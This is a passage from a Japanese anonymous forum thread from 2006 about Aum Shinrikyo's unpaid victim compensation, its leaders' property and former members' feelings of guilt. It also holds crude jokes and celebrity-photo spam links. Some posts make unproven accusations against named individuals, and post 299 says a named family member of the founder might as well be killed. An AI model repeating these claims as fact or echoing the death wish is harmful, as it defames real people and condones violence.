 その場合、外敵を作って、組織固めを図る。それが定石らしい。
オウムの暴走の原因もこれかも知れんが、 いずれにせよ、起こした事件は、どれもかなりの準備が必要なものばかり。

 当時の幹部クラスは、どの件をも 当然、知っていたはずだよ。 笑




241 :名無しさん@3周年:2006/10/12(木) 21:14:50 ID:EjADVXem
>>214
賠償金額÷当時居た信徒数で割ったお金なんか、十二分に超えて無償の布施してるのですが
全然賠償金が追いついてない様です。何処に漏れてるのでしょうか?
果たして教団に布施する事が、責任を取る事、反省になるのでしょうか?

242 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 21:16:39 ID:1QTbK4Ru
>>263

もちろん全部知ってた幹部もいるだろうね^^

243 :名無しさん@3周年:2006/10/12(木) 21:21:31 ID:aSJacir+
>>239
ケイマさんタバコ吸ってる。普通のOLだったんだよね。

244 :阿佐谷北本人:2006/10/12(木) 21:21:53 ID:fQYx8d98
>>242 もちろん全部知ってた幹部もいるだろうね

実権を握っていた幹部の人数はそう多くは無かった。
実行犯というのは、手下、舎弟なんだ。

 当時子供だった者は除くとすると、幹部はかなり少数。
全員が、裏で口裏合わせをしていたと考えるのが、自然だよ。

 裁判を乗り切る為に用いた彼らの方便を、今も鵜呑みにしていい訳がないじゃないか?笑




245 :名無しさん@3周年:2006/10/12(木) 21:22:14 ID:51ZYqjDa
>>230
その事故について知らないけど
オウムのワークは安全管理がずさんだから
人災の可能性もあるんじゃない?

246 :名無しさん@3周年:2006/10/12(木) 21:23:05 ID:gETWMS6R
逆に、賠償金を全額払い終われば、それが教団解散の合図になるってこと?
それはどうなのかしら?



247 :阿佐谷北本人:2006/10/12(木) 21:23:35 ID:fQYx8d98
>>242 もちろん全部知ってた幹部もいるだろうね

 実権を握っていた幹部の人数はそう多くは無かった。
実行犯というのは、手下、舎弟なんだ。

 指示はしただろうが現場を知らない教祖の元で、少数の幹部たちはあれこれと
考えをめぐらせていたに違いないよ。


248 :阿佐谷北本人:2006/10/12(木) 21:24:36 ID:fQYx8d98
>>246

 元現信者らへの補償や償いも不可欠だろう。

249 :名無しさん@3周年:2006/10/12(木) 21:25:19 ID:eNRq9how
>>237
痛すぎる、

250 :阿佐谷北本人:2006/10/12(木) 21:26:51 ID:fQYx8d98
>>246

これ以上、教団サイドも 死人を出したくはなかろう。

事件以降これまででも、苦情を入れた信者が何人も死んでいる。
不審な死に方をした者もいる。


251 :阿佐谷北本人:2006/10/12(木) 21:28:57 ID:fQYx8d98
>>249 痛すぎる

 真相究明のためには、元幹部らの再逮捕は不可欠だということだよ。
迷宮入りが当たり前になってはいけない。

 事件以降これまでにも、教団に苦情を入れた信者が何人も死んでいる。
その中には、不審な死に方をした者もいるのだ。



252 :名無しさん@3周年:2006/10/12(木) 21:30:28 ID:gETWMS6R
>逆に、賠償金を全額払い終われば、それが教団解散の合図になるってこと?
それはどうなのかしら?

賠償金を返す、返さないに関わらず教団は存続する権利が教団にあるのかしら?
よく言われるのは、賠償金を払う義務があると、
だから存続すると、、
しかし、のぼしているのよね?で、年間教団が被害者に賠償する額より
国がオウムにかける金のほうが、ダントツに経費がかかっているんじゃないのかすら?

で、この教団に布施しても、ちゃんと賠償にまわさないっていって
サリン基金とかに回す人もいるわけでしょう
それだったらさ、単に被害者賠償終われば、教団がつぶれるっていうなら
テレビでも呼びかけて、国民ひとりあたり、サリン基金に
50円出してくれれば 38億くらいすぐに払い終わるのよね?

それくらい50円や100円出しても、オウムがつぶれるならそれでいいって
人が大半じゃないのかしら?
けっきょく、信教の自由で、つぶせないわけ?
あるいは、追い詰めると過激になるとか、、そういう危惧かしら

253 :名無しさん@3周年:2006/10/12(木) 21:33:40 ID:eNRq9how
>>251
お前、よくレスアンカー見てレスしろな。ボケが

254 :名無しさん@3周年:2006/10/12(木) 21:35:00 ID:6yookvVS
「御家族」に支払われてる金も賠償の為の差し押さえ対象にならんかね?

255 :名無しさん@3周年:2006/10/12(木) 21:37:35 ID:aSJacir+
>>57
マンジュシュリーさん地獄に落ちたの?あの人の声好きだったな。
ラジオ放送で、気の力で悪い影響を全て弾き飛ばしてしまうんです。
って言ってた。確かにそんな雰囲気の人だったな。あのぶっ飛び感は
テレビに出たときマスコミの人たちの間でもすごく印象に残ってたみたい。


256 :名無しさん@3周年:2006/10/12(木) 21:40:40 ID:aSJacir+
細かい事言いますけど>>242のシヴァの喜びさん飛び先の番号間違えてます。

257 :名無しさん@3周年:2006/10/12(木) 21:44:59 ID:MSllPuam
アチャリのマンションも当然差し押さえの対象になると思われますが?
早く取り上げちゃってください。

258 :名無しさん@3周年:2006/10/12(木) 21:46:32 ID:zGNMGNDr
>228
二ノ宮が金貯めこんでるなら、強制的にとれないの?
被害者が聞いたら怒るだろうな。特に高橋シズエさん。

阿部三郎にもタレこむべし。


259 :名無しさん@3周年:2006/10/12(木) 21:47:38 ID:6yookvVS
刑が確定した尊師はもう囚人だからオナニも禁止。被告とは段違いに制限された日々を送ってるのだろう

260 :名無しさん@3周年:2006/10/12(木) 21:48:40 ID:aLTpmk1A
二ノ宮は何を企んでるんだ?
どうせろくな事じゃないんだろ?

さっさと取り上げて賠償金へ回す!

261 :名無しさん@3周年:2006/10/12(木) 21:50:35 ID:a3zUxuJe
グ〜ルの苦しみは〜♪

自〜己の因〜♪

262 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 21:54:32 ID:1QTbK4Ru
>>256

あ、ごめん。


263 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 21:58:10 ID:1QTbK4Ru
>>258
>>260

警察が泳がせてるんじゃない?
で、一気に捕るために・・・。
と、想像。


264 :名無しさん@3周年:2006/10/12(木) 22:00:58 ID:c2qZsF41
>元現信者らへの補償や償いも不可欠だろう。

超激しく同意。
腹立ってきた。

265 :名無しさん@3周年:2006/10/12(木) 22:04:23 ID:6yookvVS
>264
失ったものは物質的なものじゃない。だからお金で換算できない

266 :名無しさん@3周年:2006/10/12(木) 22:05:13 ID:UVYipxXp
>>265
能書き垂れるな。

267 :名無しさん@3周年:2006/10/12(木) 22:05:17 ID:aSJacir+
 
辞めて下向した元サマナから毎月一定額納めさせる方法ない?
自分も元出家として責任感じてる。

268 :名無しさん@3周年:2006/10/12(木) 22:05:59 ID:OX04HZ0X
>>265
お金で換算できる物もありますが何か?

269 :名無しさん@3周年:2006/10/12(木) 22:08:26 ID:6yookvVS
>>268
お布施とか確かにあります。訂正

270 :名無しさん@3周年:2006/10/12(木) 22:44:54 ID:Q292vMhC
上祐、村岡、野田、二ノ宮、杉浦兄弟は遺族被害者に直接謝罪しろ!!
特に野田、桃源事件被害者へだ!!


271 :松本ファミリーと信者へ:2006/10/12(木) 22:53:00 ID:OvONmMQ2
こういう物件探せばあるんで、こういう所住んでくれないかな!浮いた分は
賠償金に回してさぁ!

小田急線 下北沢 歩12分 家賃1万7千円 築31年 トイレ共同風呂無し

東武東上線 ふじみ野 歩18分 家賃1万3000円 風呂無しトイレ共同 
      
山手線   池袋   歩13分 家賃1万8000円 風呂無しトイレ共同
           和室3畳 築36年

阪神 今津 歩3分 家賃1万8000円 風呂無しトイレ共同
      築47年



272 :松本ファミリーと信者へ:2006/10/12(木) 22:56:30 ID:OvONmMQ2
こういうアパートあるんで、こういう所住んでくれないかなぁ
浮いた分は賠償金に回してさぁ

家賃1万5千円風呂無し
http://dokuo-ha-hitori.dyndns.tv/~dokuopics/cgi-bin/src/1160660081922.jpg


273 :松本ファミリーと信者へ:2006/10/12(木) 22:59:19 ID:OvONmMQ2
上祐さんもサマナのみなさんもサラリーマンになって(それが
無理なら土方になって)
賠償金返してください。それが一番手っ取り早い道です。
つまらん説法やドグマで信徒から搾り取るよりも!

274 :松本ファミリーと信者へ:2006/10/12(木) 23:04:01 ID:OvONmMQ2
M派のVC師よ、綺麗な一戸建の道場持てたのは功徳の力だと言っておる
よなぁ。その論法だとアーチャリーがマンション持てたのも功徳という
ことになるでよ。
道場など粗末でよかったんじゃないの?


275 :名無しさん@3周年:2006/10/12(木) 23:06:35 ID:6yookvVS
>>271-272
借家だと立ち退きを迫られたりするからいわくつき物件とかを安く手に入れたりするんだって

276 :名無しさん@3周年:2006/10/12(木) 23:07:06 ID:rdODWz0P
>267 邪推すると、現役出家者の書き込みじゃないかと、、想像してしまう
そうしてくれたら、現役が楽になるからな

オウムって、最盛期で信者が1マンくらいいたそうじゃない?

で、元信者すべてに、たとえば5000円でもいいから
サリン基金に入れてくれ、ってテレビなんかで大々的に放送できないもんかな
ていう漏れも、実はお金を送らせていただいたことは、ないんだけど、、

てのは、お金送るとき、自分の名前口座が知れるわけでしょう?
まあ、オウムと関係ない人で、わざわざ寄付くださる方もいると思うけど
たいがい、振り込んでくるのは、やめた信者なんかじゃ、ないかなと
すると、こっちの身元が、元だって知れるのを、恐れてしまって、と
いうのと、
焼け石に水程度のお金しか、だせないと思うと、意味があまりなく
感じてしまう、、って

ある程度の額が集まることが期待できるのであれば
元信者ひとりあたり、5000円や10000円くらい、出しても
異存はないんじゃないかなあ、と
ただ、もう関わりをたったわけで、また、どこかから、電話がかかってきて
あなた元でしたよね、とか 言われるのが苦痛だから、、


277 :名無しさん@3周年:2006/10/12(木) 23:08:48 ID:rdODWz0P
サリン基金に振り込むとき、こっちの口座指名がばれないように
振り込むことって、できないだろうか?


278 :松本ファミリーと信者へ:2006/10/12(木) 23:10:16 ID:OvONmMQ2
>>275
いわくつき物件ってあーた、信者が住んでいるのがまさにそれでしょ?
GSハイムは値段がつかないほど安く売りに出されてるそうだし、


279 :名無しさん@3周年:2006/10/12(木) 23:11:35 ID:rdODWz0P
強度が足りなくて建て替えするって、騒いでいた例の物件
そのまま引き取るとか、、

280 :名無しさん@3周年:2006/10/12(木) 23:26:02 ID:fJBRM0Lm
ボロ物件の紹介屋さんよ、
あんたの狙いはまず、彼らを惨めな境遇に置くことだろ?
そしてその上、賠償金をまわせ、ということで
彼らを惨めな境遇に置くことで達成できる優越感を正当化できるわけだ。

281 :名無しさん@3周年:2006/10/12(木) 23:30:36 ID:rdODWz0P
共同便所って、自分が入りたくても他人が入っていれば
当然我慢とか、掃除は当番、なんでしょう??
それがいやだなあ、
おまるでも使うか

282 :名無しさん@3周年:2006/10/12(木) 23:36:18 ID:aSJacir+
>>276
おれは現役じゃないよ。だけど責任を感じてるだけ。自分も教団を支えてた一人だった
って事が。A、M両方のホムペに破産管財人の口座乗っければいいのに。少ないけど
毎月振り込むんだけどな。

283 :名無しさん@3周年:2006/10/12(木) 23:38:06 ID:rdODWz0P
単純に、なぜ人を傷つけないと、修行ができないのか、
そんな問いは、この教団では、(臭い質問)なんだろうな
あんな異常なグル、まだ拝みたいなんて



284 :名無しさん@3周年:2006/10/12(木) 23:40:02 ID:51ZYqjDa
こういうボロアパートに信徒が住んでたんだよ
生活費切り詰めて布施してたんだ
オウムは惨めな境遇?の奴らを騙して金ぶんどってたんだろ


285 :名無しさん@3周年:2006/10/12(木) 23:49:15 ID:Iu55nI0G
物件選びは真心のある紹介やが決めてだね

286 :名無しさん@3周年:2006/10/12(木) 23:55:13 ID:51ZYqjDa
便所は大家が掃除する

共同便所のアパートの信徒もいたけど数が少ないから
風呂無しアパートに住み食費切り詰めて布施ってのが
一人暮らし信徒のスタンダードなライフスタイルだった、あとサラ金に借金もね
オウムはそんな奴らから絞り盗ってたんだぜ

287 :名無しさん@3周年:2006/10/12(木) 23:57:41 ID:fJBRM0Lm
騙されていようが、自分の意思で布施していたのなら
それは惨めでもなんでもない。
今の教祖一家にそれを求めれば、それは彼らにとって惨めだ。
誰しも人間だから他人を惨めな境遇にしてしまうこともある。
しかし、意図的に惨めな状況になることを命ずる権利はない。

288 :名無しさん@3周年:2006/10/13(金) 00:03:07 ID:X5BVgigD
解脱すると部屋の広い狭いで、一切苦しみは感じないんでないの???
イニしぇーショんって麻原の本に書いてあったはずだが
あんた現役?驚愕ができてましぇんなW

289 :名無しさん@3周年:2006/10/13(金) 00:06:21 ID:51ZYqjDa
>意図的に惨めな状況になることを命ずる権利はない。

何をおっしゃる現役さん
それをやったのがオウムではないか

290 :名無しさん@3周年:2006/10/13(金) 00:19:09 ID:lB9sdx/r
オウムもたいがいワンパターン思考だが、
それにまつわりつく者もまたワンパターン思考だなあ。
ちょっとでも擁護と思われる文章があると、
相手を現役だと考えるのは悪い癖だ。

私は彼らを、必ずしも解脱してないのではないかと考えている。
だから言ってるんだよ。
また、オウムは意図的に惨めな状況になれ、と命じたことはない。
単に他人を惨めにしてしまったことはあると思うけどね。
誰かに向かって「お前は惨めな状況で生きろ」とは言わないのがオウムだ。

だから彼らが、自然に惨めな状況に陥ったとしても、
それは自然の成り行きだからなんとも思わない。
ただ、他人であるあなたたちが「惨めになれ」と命じることは許せない。
それだけのことだ。
それはただ、人間の本能から出た言葉でしかないからだ。

291 :名無しさん@3周年:2006/10/13(金) 00:26:14 ID:st56uJvs
第一次大戦後のドイツにヒトラーが登場したのは、そこに歴史的な必然
とういうか歴史の巨大な運命もあったように思う。
20世紀末の日本に密教ヒトラーである麻原さんが登場したのも、そこに
巨大な歴史的運命があったのではないか?


292 :名無しさん@3周年:2006/10/13(金) 00:30:21 ID:st56uJvs
麻原さんのテロ計画は失敗したように見えるが、報道されたものを
見る限り、サリンはむろん炭素菌、大型ヘリ、突撃銃、ロケットランチャーなども使い、
密教ヨガ、薬物、洗脳まで駆使してやるつもりだったのだろう。
国松長官狙撃事件を見たら解るように拳銃による暗殺もカードだったのだろう。
まさに密教ヒトラーであろうが、密教とヒトラーが合体したような宗教が生まれたのは
そこに巨大な歴史的必然があるように思うぞ。
ちょっとやそっとじゃあんなもの生まれる訳がない。



293 :名無しさん@3周年:2006/10/13(金) 00:33:23 ID:st56uJvs
現在オウムを掌握してると言われる上祐は麻原さんが密教ヒトラー
なら、上祐はさしずめ密教スターリンで密教スターリン体制なんて
のを構築していくのではないか?
そのうち密教毛沢東や密教カストロなんてのも登場するかもしれない。
自民党の密教化なんてのもありえるのではないか?
すでに現時点でも自民党は創価学会や統一教会などの宗教とも仲良しなのだ。


294 :名無しさん@3周年:2006/10/13(金) 00:36:40 ID:X5BVgigD
>私は彼らを、必ずしも解脱してないのではないかと考えている。

オウムはそうは言ってない。正悟師とは個の解脱を果たした者、供養に値する魂
と定義付けされてる訳だが、解脱してないとするならば当然供養に値しないでしょw

>「お前は惨めな状況で生きろ」とは言わないのがオウムだ。

あなた、どれだけオウム知ってますか?
オレは某幹部が借金して自己破産してしまえ、と在家信徒に言ったの目撃してるよ

295 :名無しさん@3周年:2006/10/13(金) 00:45:45 ID:nGSA7mcH
>>294 >オレは某幹部が借金して自己破産してしまえ、と在家信徒に言ったの目撃してるよ
誰ですか?実名を

296 :名無しさん@3周年:2006/10/13(金) 00:47:05 ID:4CCtAIzk
麻原の見解ですから。


そのまえに、解脱のためにをつけるのさ

297 :名無しさん@3周年:2006/10/13(金) 00:47:34 ID:X5BVgigD
それを言うとオレが誰だか見当つくかも知れないからなぁ
ま、今もいる幹部とだけ言っておく

298 :名無しさん@3周年:2006/10/13(金) 00:49:04 ID:4CCtAIzk
麻原の見解ですから。



そのまえに、解脱のためにをつけるのさ

299 :名無しさん@3周年:2006/10/13(金) 00:51:03 ID:+uZ3Tz35
287
もういい加減にしてよ
あの人たち、単に金使い荒いだけじゃない
それに、現在の幸せ不幸などどうでも、最終的に解脱できればいいって
教組がいったのよ
マンションなんかどうでもいいじゃないの
まったく
仮谷さんは、信者でもないのに、金もちだったせいで、殺されたわよ
家屋敷持っていたから、教組が欲しがったのよ
マンションなんか、よく買えるわね
殺されたらいいじゃないの

300 :名無しさん@3周年:2006/10/13(金) 00:53:24 ID:IfIB0iTf
>291〜293
アポロンじゃないか。なんで匿名でこんな所にw


301 :名無しさん@3周年:2006/10/13(金) 00:57:31 ID:+uZ3Tz35
盛れと一緒に住んでいた元サは、下向したばかりで金がなかったけど
私と一緒にイニを勧められて、ふたりで260近く借金したわよ?

ふたりとも金がないのよ?
ただ、現在働いているから、払えるだろうという見込みがあるだけ
だけど、相手の経済事情なんか、一言も聞いてこないで
ただ、借金してでも受けろとか、いったわよねえ

それに、ロータスヴィレッジ構想ってあったけど
あれ、教団は実際土地なんかもっていなかったのに
信者の家に勝手に忍び込んで、権利書や実印盗んで
教団の所有にして、それをあたかも教団のもののように
宣伝したいたそうじゃないの?

ロータスヴィレッチ構想のパンフレット、カラーすりでもらったわよ
学校や病院なんか、みんな作って、って、、
それ、そのまま、信者の夢であったものを、教団がいいねえ、って
勝手に乗り気になって、横取りしたらしいよ


302 :名無しさん@3周年:2006/10/13(金) 01:00:07 ID:+uZ3Tz35
301
誰かその件しらね?ちょっと本で読んで、、わすれたけど
盗みに入ったのは、ソーナーって書いてあったっけ?


303 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/13(金) 01:01:01 ID:Pv+jJ5eC
>>287
>騙されていようが、自分の意思で布施していたのならそれは惨めでもなんでもない。
今の教祖一家にそれを求めれば、それは彼らにとって惨めだ。誰しも人間だから他人を惨めな境遇にしてしまうこともある。
しかし、意図的に惨めな状況になることを命ずる権利はない。

却下。
騙されていたからこそ惨めなのだよ。
あなたの言うように惨めになれとは誰も命令はできない。
しかし「責任を取れ」とは言える。
教団の最高幹部として責任を取る義務がある。
そして、解脱してるって言い張るのだから彼らには現実の諸々の条件によって苦が生じないって
ことを証明する義務もあるし、平気なはずなんだからw

304 :名無しさん@3周年:2006/10/13(金) 01:11:08 ID:+uZ3Tz35
自分がだまされるようなカルマがあった、ってところに意気消沈しているよ
別に、そこそこ正直に生きているつもりだけど
カルマがどうってより
騙されるという気質がいけないのかと
つけこまれやすい性格かなとか、
軽率であったとか、見る目が無かったとか、無念だよ

まあ、生きているから、愚痴もいえるんだけどさ
通りすがっただけでなくなった方は無念であろうよずっと

305 :名無しさん@3周年:2006/10/13(金) 01:20:31 ID:4CCtAIzk
ひどいよね。まったり、焦らず急がずの人にとばっちり
だもんね。

306 :名無しさん@3周年:2006/10/13(金) 01:29:50 ID:gzTqqBJo
とにかく、アーチャリーは事件後も、セミナーをはじめいろいろとやったんだから
責任はとらなければならない。賠償もせず、知らん顔で学生生活をすることは
許されない。それもあろうことか信者の布施で。

子供という言い訳は通じない。
都合のいいときだけ子供のふりをするな。

307 :名無しさん@3周年:2006/10/13(金) 01:31:50 ID:+uZ3Tz35
http://page.auctions.yahoo.co.jp/jp/auction/90851520

ガキドモ、よく見ておけよ、、記念すべき

308 :名無しさん@3周年:2006/10/13(金) 01:56:17 ID:X5BVgigD
入札者いるんだな
神仙の会の会員誌シャンバラ新聞売れるかねw

309 :名無しさん@3周年:2006/10/13(金) 01:57:13 ID:4CCtAIzk
三代前の人の想いを、その人達は確認できないけど
私達はしってる。
でも、三代のちを確認できない。
そんなもんだろ

310 :名無しさん@3周年:2006/10/13(金) 02:26:07 ID:+uZ3Tz35
           /|
            / :::|
         /   :::|
      /     :::|                  /|
   /       .::::|__               / :::l
 /              ̄ ─ ___      /    :::|
/                       ̄ ‐-'       :::|
     、、_j_j_j_ ,.                       :::|
   、_>''乙W△`メ._,                       :::|
  く(  {三●;=}   ヽ_,                  :::|
   ´ ニ=;ゞ'丕シ_____,ム         、、_j_j_j_ ,    :::|
      ´ ゙ ゙ ` `        、_,>''乙W△`メ._,  :::|.
                    く(  {三●;=}   ヽ_, :::|
   {                    ´ ニ=;ゞ'丕シ_____,ム :::|
    | ̄ ― _              ´ ゙ ゙ ` `  ::::|
     |       ̄ ― _                 .:::/
    ヽ             ̄ ― _   ノ   .:::/  マンションって、ステキ?♪
       \                   ̄/   .::::/
ヽ       \               /    ..:::::/
          ̄ ― __   ―   ̄    ...:::::/
                           ...:::::::/


311 :名無しさん@3周年:2006/10/13(金) 02:28:22 ID:4CCtAIzk
別に、麻原を拝みたいわけではないが、グルにたいする
帰依を否定するなら宗教の伝統をも否定することになる
だから私は考えた。
帰依のマントラを一日一回唱えよう。
不真面目だと幹部はゆうけど言いなりで殺す奴の方が
不真面目だろ。だから俺は弟子の中で1番偉い

312 :まつもとちづお:2006/10/13(金) 02:29:15 ID:NrJ9OhML
50歳過ぎても、ますたーべーしょん止められません。
どうしたら、止められますか?

313 :名無しさん@3周年:2006/10/13(金) 02:29:58 ID:+uZ3Tz35
ヽ( ・∀・)ノ● ウンコー

314 :名無しさん@3周年:2006/10/13(金) 02:47:51 ID:yGlJrtDE
松本って目見えないのに、
どうやって美人と不細工を見分けてたんだ?


315 :名無しさん@3周年:2006/10/13(金) 02:49:37 ID:st56uJvs
オウムを否定するならまだ解るが、宗教そのものを根底から否定
するならこりゃ宗教戦争になる可能性もあるだろう。
宗教そのものを否定する人間は宗教の敵なのである。
創価学会も権力であるし、金もあるので反宗教勢力とは自己保存の
ためにも果敢に戦うのではないか?


316 :名無しさん@3周年:2006/10/13(金) 02:53:15 ID:HBX4Efl+
>>314
神通力(超能力)

317 :名無しさん@3周年:2006/10/13(金) 03:15:33 ID:4CCtAIzk
そりゃ攻めてくるってんならしかたがないが、
でも宗教なんだからさ、違う方法での解決を考えろっての
例えば神通力とか・・・

318 :名無しさん@3周年:2006/10/13(金) 03:16:39 ID:HBX4Efl+
他の具体例はないのか・・・ orz...

319 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/13(金) 03:20:13 ID:Pv+jJ5eC
>>311

別に宗教の伝統を否定するのではなく麻原を否定すればいいんだよ。

320 :名無しさん@3周年:2006/10/13(金) 03:20:58 ID:X5BVgigD
宗教はアヘンwオウムにいてそれを嫌と言うほど見させてもらったよ
宗教戦争ねえ、信仰の違いごときで戦争かね、百済ない
宗教の存在意義、その扱う領域は否定しない
しかし、迷信・盲信の類は取り除く必要がある

321 :名無しさん@3周年:2006/10/13(金) 03:25:32 ID:X5BVgigD
新興宗教は胡散臭い、これはほぼ間違い無い
もちろんオウムも然り
伝統宗教は、と言っても様々だが
新興宗教と比べてまともだね

322 :名無しさん@3周年:2006/10/13(金) 03:37:34 ID:X5BVgigD
麻原彰晃曰く、美人でもブサイクでも
1LDKのマンションでも3LDKの家でも
安い中古車でも高級車でも
悟りを開くと苦楽に左右されないんだってよw
みんな同じに感じるんだってw

323 :名無しさん@3周年:2006/10/13(金) 03:54:11 ID:X5BVgigD
>>311
ネタに?マジレスもナンダカ゛
オウムの帰依マントラならば即刻やめれ
麻原以外にグルはたくさんいる

324 :名無しさん@3周年:2006/10/13(金) 03:56:17 ID:4CCtAIzk
あいつはそうらしな。
俺はちょっとな。婆さんはいくらなんでも無理っす。
まぁでも、いいもんはいいし、うまいもんはうまい。
自分で一生懸命稼いだ金で腹一杯食うのがいい。

325 :名無しさん@3周年:2006/10/13(金) 04:06:45 ID:X5BVgigD
神通と言えば、麻原が慌てたのを覚えている。八七年だったかな
代々木の実践瞑想ヨーガ(後の真理の集い)でのこと
参加者が神通があるなら、私の心を読んでみろ、と麻原に言った
麻原は焦ってたね、声が引きつっていた
私はあなたの潜在意識を読むかもしれない
表層意識、あなたの今考えてることとずれるかも知れない
と言い訳していたな。心読む前にね

326 :名無しさん@3周年:2006/10/13(金) 04:15:35 ID:4CCtAIzk
俺にゆわれたとしても、顔引きつるわ

327 :名無しさん@3周年:2006/10/13(金) 04:28:57 ID:st56uJvs
1、オウムを否定するが、宗教そのものを否定するわけではない
2、宗教にまつわる一切を根底から否定する
このうち2は宗教戦争になるしかないと思う。
ソ連とアフガンのタリバンが戦争したのも、2の理由からだろう。



328 :名無しさん@3周年:2006/10/13(金) 04:32:44 ID:st56uJvs
マルクス曰く宗教はアヘンだと書いてる人間もいるが、では
墓参りもアヘンだからいかんとか言うのか?
結婚式や葬式もアヘンだから少しでも宗教色があったらいかん
とでも言うのだろうか?
そこまでの論理になるとこれは宗教戦争勃発しかなかろう。


329 :名無しさん@3周年:2006/10/13(金) 04:43:03 ID:X5BVgigD
ん?オレのことかな?
宗教はアヘン。それはオウムにいて実感したさ、まさに精神の麻薬だとね
アヘンってのは、宗教のネガティブな面を揶揄する言葉として使っているだけ
なんだけどな

330 :名無しさん@3周年:2006/10/13(金) 04:48:10 ID:X5BVgigD
ちなみにオレは墓参りもすれば法事にも出る
石ころに手合わせ酒飲んで雑談し美味いもん食う
必要とあらば初詣では神社に手合わせ神戸垂れるわ
社会的儀礼ってやつですよ

331 :名無しさん@3周年:2006/10/13(金) 04:48:25 ID:st56uJvs
よくは知らないが、オウムはオウム食と呼ばれる野菜中心の粗食
みたいなのを食って、ヨガ体操みたいなのをして過ごしてるの
ではないのか?
何も食わずアヘンだけを吸ってる病人とは違って少なくとも健康的
ではないかと思うがな。


332 :名無しさん@3周年:2006/10/13(金) 04:51:59 ID:X5BVgigD
でもな、麻原とオウムには死んでも頭さげねえよ

333 :名無しさん@3周年:2006/10/13(金) 04:56:49 ID:4CCtAIzk
分祀はダメだね。
政治が関わっている証拠になる。靖国は終わる。
その時代の人も良かれと想って死んでいきました。
先人のすがった社。
その首を土産にはできんでしょう。
政治と宗教は違う。
政治のメスのいれぐあいで、国民の精神の高さを証明できる。
政治は歴史や宗教をはなすべきではない。
俺ならこういう。
「関係ないから」

学ぶのは自由。参拝するのも自由。しかし、語らない

334 :名無しさん@3周年:2006/10/13(金) 05:07:30 ID:HBX4Efl+
やいおまいら
気分転換の時間がやってまいりました
いまリア・ディゾンが熱いぞ

掴みはコレでばっちりだ
ttp://www.b-idol.com/bbs/1159308637/img/000084.jpg
ttp://www.b-idol.com/bbs/1159308637/img/000088.jpg
ttp://www.b-idol.com/bbs/1159308637/img/000089.jpg
ttp://www.b-idol.com/bbs/1158930782/img/000093.jpg
ttp://img.photobucket.com/albums/v627/Udin/Leah%20Dizon/LeahDezon56F3D359DE304FA293F197249C.jpg
ttp://blog6.fc2.com/p/poseidon2/file/20060428pa.jpg
ttp://leahdizon.paslog.jp//media/file_20060412T033208546.jpg
ttp://blog2.fc2.com/e/erog/file/20051013_LeahDizon_001.jpg 〜 020.jpg

335 :名無しさん@3周年:2006/10/13(金) 05:08:44 ID:HBX4Efl+
画像ギャラリーでリアる
ttp://www.b-idol.com/read.cgi/bbs/1158930782/88-98
ttp://www.b-idol.com/read.cgi/bbs/1159308637/83-89
ttp://www.carandmodel.com/gallery/fmodel_leah_dizon?page=1
ttp://sin.s5.x-beat.com/leah_dizon_01/
ttp://g-idol.com/ra/Leah_Dizon.htm
ttp://bbs.games.tom.com/forum/view_thread.php?forumid=308&threadid=20220&page=1
ttp://photo.xuite.net/jay0702/380326

動画でリアる
GyaOニュースの動画 (Pass : 0yYYLrYZ0)
ttp://www.uploda.net/cgi/uploader1/index.php?dlpas_id=0000160335.zip

関連スレでリアる
http://pie.bbspink.com/test/read.cgi/girls/1158229020/l50

336 :名無しさん@3周年:2006/10/13(金) 05:09:32 ID:HBX4Efl+
公式サイトでリアる
ttp://ameblo.jp/leahdizon/
ttp://leah-dizon.net/
ttp://www.leahdizon.com/
所属事務所にリアがいる
ttp://skycorporation.co.jp/page.php?tl_id=100
ファンサイトでリアる
ttp://www.leah.jp/
ttp://leahdizon.paslog.jp/
ttp://shoppingbest20.seesaa.net/article/25286928.html
ttp://www.3ka.biz/2006/10/leahdizon4.html
ttp://babydoll927.jugem.jp/
関連サイトでもリアる
ttp://www.famitsu.com/pcent/news/2006/09/20/505,1158729064,60329,0,0.html
ttp://babes.entertainment.ign.com/articles/625/625471p1.html

1クリック検索で便利にリアる
ttp://images.google.co.jp/images?hl=ja&q=Leah%20Dizon&lr=lang_ja&sa=N&tab=wi
ttp://ttsearch.net/s2.cgi?k=Leah+Dizon&o=r
ttp://search.auctions.yahoo.co.jp/jp/search/auc?p=Leah+Dizon&auccat=0&alocale=0jp&acc=jp

337 :名無しさん@3周年:2006/10/13(金) 05:12:15 ID:4CCtAIzk
携帯はしんどいわ。気がむいたら満喫いくわ。
そんとき、適当にかいたるわ

338 :名無しさん@3周年:2006/10/13(金) 05:19:56 ID:st56uJvs
宗教はアヘンであるというのはマルクス主義の見解な訳で、ここ
には全宗教、宗教のあらゆるもの対マルクス主義という宗教戦争
に直結する戦いがあるだろう。
どちらの陣営にとってもこれは聖戦であり、凄惨な戦いになること
も予想される。
イラクでアメリカ軍とアルカイダがやってるようなのもそうだろう。


339 :名無しさん@3周年:2006/10/13(金) 05:22:38 ID:X5BVgigD
オレは7年前のパソ使うてるからな
動画わもちろん静止画像もアウトや
オウム時代の倹約癖から抜けられひんからな

340 :名無しさん@3周年:2006/10/13(金) 05:24:44 ID:st56uJvs
思うにこれは両陣営にとって妥協できない戦いなのである。
かっての資本主義対共産主義という冷戦対決のようなものだ。
靖国反対を叫ぶ陣営は一切の宗教施設を破壊し、宗教を根底から
破壊しろという見解なのだろうし、反対に多くの宗教陣営では
これと全面対決することを辞さないだろう。
まったくかっての冷戦と同じく原爆が使用されてもおかしくない
両陣営の先鋭化が必然的に起きる。


341 :名無しさん@3周年:2006/10/13(金) 05:26:03 ID:X5BVgigD
マルクスて前時代の亡霊でっせ

342 :名無しさん@3周年:2006/10/13(金) 05:27:29 ID:st56uJvs
スターリン時代の共産圏と西側世界が対話することはあり得なかった。
その後のデタントの時代を待つしかなかった。
この新しい対立も然りだろう。
いわば新しい冷戦のはじまりということか。
新しい21世紀の鉄のカーテンが敷かれたのだな。


343 :名無しさん@3周年:2006/10/13(金) 05:35:20 ID:X5BVgigD
自由主義世代の若者をカドワカシたのは何処のどいつかな?
妄学校出の劣等感に苛まれた野心家のおっさんやないか
産まれてくるのが10年遅かったんとちゃうんか?

344 :名無しさん@3周年:2006/10/13(金) 05:36:22 ID:HBX4Efl+
戦ってるのはオウムだけじゃないのか?

345 :名無しさん@3周年:2006/10/13(金) 06:19:17 ID:HBX4Efl+
携帯からならsexy-gy.co m のラ行

